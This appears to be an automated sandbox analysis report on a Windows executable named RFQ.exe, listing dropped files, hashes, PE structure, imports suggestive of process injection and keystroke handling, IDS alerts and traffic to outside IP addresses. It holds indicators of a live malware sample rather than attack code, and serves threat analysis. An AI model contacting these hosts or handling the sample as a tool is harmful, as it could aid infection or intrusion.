                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\F14431U2a

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\net.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):114688
                                                                          Entropy (8bit):0.9746603542602881
                                                                          Encrypted:false
                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\unbarricadoed

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\RFQ.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):288768
                                                                          Entropy (8bit):7.9954492864746225
                                                                          Encrypted:true
                                                                          SSDEEP:6144:hl1xB50rljRyJF4onj1Ld826/j3rjPlmfoT6FWBTE6U9CuXYI:b1xoRU8onj1c/j7jPlmfN2T8ouX1
                                                                          MD5:B34C8BC7922F975DF317643497031AB4
                                                                          SHA1:F2825F7B5004C55A26FE310B40F981DC7105CDF6
                                                                          SHA-256:8F7342284DADD7C4485EF7F9D999C313841D0FCD50D5B59013AEF7BFED18B64F
                                                                          SHA-512:60FF29E6F4DBECC9A6623B748255133982F3DB9CBB76E32665CF45B5AE71B7625CDF6ACC50F9CE1974EC139205749D3143233CAC35A0B09F898CF0044F703958
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.j...SESH..0..~.Y1...f3@...ESHBZC9ALKXBVY2JO6N0HJXSESHBZC.ALKV].W2.F.o.I..r.;!1z3K.+99/v:S$!Y:.*/x!0=h+4c}..k5-2<.GB<j0HJXSES1CS..!+.e"1..*(.T..b3".R...!+.B....*(..Y+"e3".HBZC9ALK..VY~KN6G.E.XSESHBZC.ANJSC]Y2.K6N0HJXSES.VZC9QLKX2RY2J.6N HJXQESNBZC9ALK^BVY2JO6N@LJXQESHBZC;A..XBFY2ZO6N0XJXCESHBZC)ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6`D-2,SESl.^C9QLKX.RY2ZO6N0HJXSESHBZC.AL+XBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALK

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.413126135947961
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:RFQ.exe
                                                                          File size:1'604'608 bytes
                                                                          MD5:b5e39c660b2e4f19cc14b94df9b6497c
                                                                          SHA1:ee331feebc062f0b0a226d36e8f0817af0cc9d65
                                                                          SHA256:593c8605076c650720fcdfa1fada91472d792da661c0f6713f857a9780a6a6eb
                                                                          SHA512:1355844266b462ec0f74642436b299bdd18246ed6c844513a687d368c338cea99b5f5d310af24477997113bd320e71f12e07d524794ebdb78c7fe5726d3a4ba8
                                                                          SSDEEP:24576:O5EmXFtKaL4/oFe5T9yyXYfP1ijXdaVLVEw40CJvqQTax1uFBJG38Pwm4j:OPVt/LZeJbInQRaVhBzCJyQKgBJdP7
                                                                          TLSH:2775D0027381D022FFAB95334B5AF6115BBC79260123E62F13981DB9BE705B1563E7A3
                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                          File Icon

                                                                          Icon Hash:aaf3e3e3938382a0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4204f7
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6731F54F [Mon Nov 11 12:15:11 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:0b768923437678ce375719e30b21693e

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007FAC50B1B1C3h
                                                                          jmp 00007FAC50B1AACFh
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FAC50B1ACADh
                                                                          mov dword ptr [esi], 0049FE10h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE18h
                                                                          mov dword ptr [ecx], 0049FE10h
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FAC50B1AC7Ah
                                                                          mov dword ptr [esi], 0049FE2Ch
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE34h
                                                                          mov dword ptr [ecx], 0049FE2Ch
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          and dword ptr [eax], 00000000h
                                                                          and dword ptr [eax+04h], 00000000h
                                                                          push eax
                                                                          mov eax, dword ptr [ebp+08h]
                                                                          add eax, 04h
                                                                          push eax
                                                                          call 00007FAC50B1D87Dh
                                                                          pop ecx
                                                                          pop ecx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          lea eax, dword ptr [ecx+04h]
                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                          push eax
                                                                          call 00007FAC50B1D8C8h
                                                                          pop ecx
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          push eax
                                                                          call 00007FAC50B1D8B1h
                                                                          test byte ptr [ebp+08h], 00000001h
                                                                          pop ecx

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e740x17c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb11b8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1860000x75cc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb10100x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34200x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10300x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x9aa370x9ac0017187df51446e12491449bc34d849147False0.5653003205775444data6.665680008888402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x9c0000x2fb920x2fc008ab1e4a7788882b436d7b30c3a4c9b0cFalse0.3529327552356021data5.692798211199345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xcc0000x705c0x4800c69381d9330fec33b92360836b24215aFalse0.043511284722222224DOS executable (block device driver @\273\)0.5845774219571381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xd40000xb11b80xb12005fb9554f38b043e9a80570ac450e7f76False0.9632531316160904data7.9618569404063555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x1860000x75cc0x760040b4850993e12fb1b505490e48047c95False0.7645325741525424data6.798203799100818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                          RT_RCDATA0xdc7b80xa8480data1.0003206244196843
                                                                          RT_GROUP_ICON0x184c380x76dataEnglishGreat Britain0.6610169491525424
                                                                          RT_GROUP_ICON0x184cb00x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0x184cc40x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0x184cd80x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0x184cec0xdcdataEnglishGreat Britain0.6181818181818182
                                                                          RT_MANIFEST0x184dc80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                          Imports

                                                                          DLLImport
                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                          USER32.dllIsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
                                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-12T08:51:57.429971+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449730TCP
                                                                          2024-11-12T08:52:35.768193+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449741TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 12, 2024 08:52:08.156316996 CET4973680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:52:08.162252903 CET80497363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:52:08.162336111 CET4973680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:52:08.170483112 CET4973680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:52:08.175384045 CET80497363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:52:08.804238081 CET80497363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:52:08.804701090 CET80497363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:52:08.804753065 CET4973680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:52:08.807779074 CET4973680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:52:08.812557936 CET80497363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:52:23.917131901 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:23.921960115 CET8049737217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:23.922039986 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:23.933362007 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:23.938276052 CET8049737217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:24.748008966 CET8049737217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:24.802269936 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:24.858531952 CET8049737217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:24.858593941 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:25.442981005 CET4973780192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:26.502959013 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:26.507930994 CET8049738217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:26.508034945 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:26.546372890 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:26.551234961 CET8049738217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:27.325246096 CET8049738217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:27.380418062 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:27.433131933 CET8049738217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:27.433223009 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:28.052319050 CET4973880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:29.123562098 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:29.128513098 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.128602982 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:29.139610052 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:29.144541979 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144689083 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144699097 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144723892 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144732952 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144756079 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144764900 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144879103 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.144917011 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:29.984438896 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:30.036655903 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:30.094999075 CET8049739217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:30.095076084 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:30.646100044 CET4973980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:31.664469957 CET4974080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:31.669425011 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:31.669502974 CET4974080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:31.676389933 CET4974080192.168.2.4217.70.184.50
